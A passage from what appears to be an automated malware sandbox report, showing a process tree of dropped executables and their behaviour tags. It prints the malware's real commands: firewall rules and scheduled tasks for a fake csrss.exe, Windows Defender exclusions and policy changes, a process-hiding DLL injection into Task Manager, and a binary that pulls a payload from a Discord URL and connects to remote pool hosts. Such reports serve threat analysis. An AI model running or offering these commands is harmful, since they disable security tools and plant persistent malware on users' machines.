      "C:\Users\Admin\AppData\Local\Temp\u1uc.1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5552
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        
        PID:4272
- - C:\Users\Admin\Pictures\Np7nxhZprpTK4hagH7g20Bek.exe
    "C:\Users\Admin\Pictures\Np7nxhZprpTK4hagH7g20Bek.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4964
  - - C:\Users\Admin\Pictures\Np7nxhZprpTK4hagH7g20Bek.exe
      "C:\Users\Admin\Pictures\Np7nxhZprpTK4hagH7g20Bek.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:5980
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1724
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2436
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:4964
- - C:\Users\Admin\Pictures\CDb5tzv095RAKNfASZDFNrbA.exe
    "C:\Users\Admin\Pictures\CDb5tzv095RAKNfASZDFNrbA.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4168
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2436
  - - C:\Users\Admin\Pictures\CDb5tzv095RAKNfASZDFNrbA.exe
      "C:\Users\Admin\Pictures\CDb5tzv095RAKNfASZDFNrbA.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      PID:5856
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3080
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2072
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5124
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5164
- - C:\Users\Admin\Pictures\7sdvdV1KeQFYxIWsBQgNwiWC.exe
    "C:\Users\Admin\Pictures\7sdvdV1KeQFYxIWsBQgNwiWC.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5108
  - - C:\Users\Admin\Pictures\7sdvdV1KeQFYxIWsBQgNwiWC.exe
      "C:\Users\Admin\Pictures\7sdvdV1KeQFYxIWsBQgNwiWC.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:5812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:5300
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4252
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5436
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:600
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4248
- - C:\Users\Admin\Pictures\ZQnEIniDJr491m3kOJDD4KtD.exe
    "C:\Users\Admin\Pictures\ZQnEIniDJr491m3kOJDD4KtD.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3392
  - - C:\Users\Admin\Pictures\ZQnEIniDJr491m3kOJDD4KtD.exe
      "C:\Users\Admin\Pictures\ZQnEIniDJr491m3kOJDD4KtD.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:5892
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:5220
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5256
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1996
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5824
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2356
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:200
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1928
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4648
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5560
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:1436
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3172
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4860
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:5364
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4564
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:5980
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2172
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        Executes dropped EXE
        
        PID:5220
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:400
      - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        6⤵
        Executes dropped EXE
        
        PID:5952
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4488
      - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        6⤵
        Executes dropped EXE
        
        PID:5744
- - C:\Users\Admin\Pictures\3ULOn4cfburOeIlM0qC3zmfc.exe
    "C:\Users\Admin\Pictures\3ULOn4cfburOeIlM0qC3zmfc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\7zS7ACD.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of WriteProcessMemory
      PID:4836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3416
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3676
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:4748
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:5736
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:5180
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:5292
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:5196
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:2848
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5516
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:5488
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5632
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:5192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5196
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1736
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5684
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7ACD.tmp\Install.exe\" it /TiGdidkyTK 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:436
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:3728
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:5824
- - C:\Users\Admin\Pictures\EawWaBuanqWfxA1wYQsP5UY0.exe
    "C:\Users\Admin\Pictures\EawWaBuanqWfxA1wYQsP5UY0.exe"
    3⤵
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:868
- - C:\Users\Admin\Pictures\a4RDq142GAZxIBaPaKzexogV.exe
    "C:\Users\Admin\Pictures\a4RDq142GAZxIBaPaKzexogV.exe"
    3⤵
    - Executes dropped EXE
    PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:360
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:5948
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:312
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:1128
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:376
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:1600
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:2872
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:3568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:1608
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5604
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:1144
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:2032
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2356
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:5168
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:3352
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5472
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5076
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA18F.tmp\Install.exe\" it /zexdidXFlt 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5416
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:5504
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:4428
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
  2⤵
  PID:2796

\??\c:\windows\system32\svchost.exe
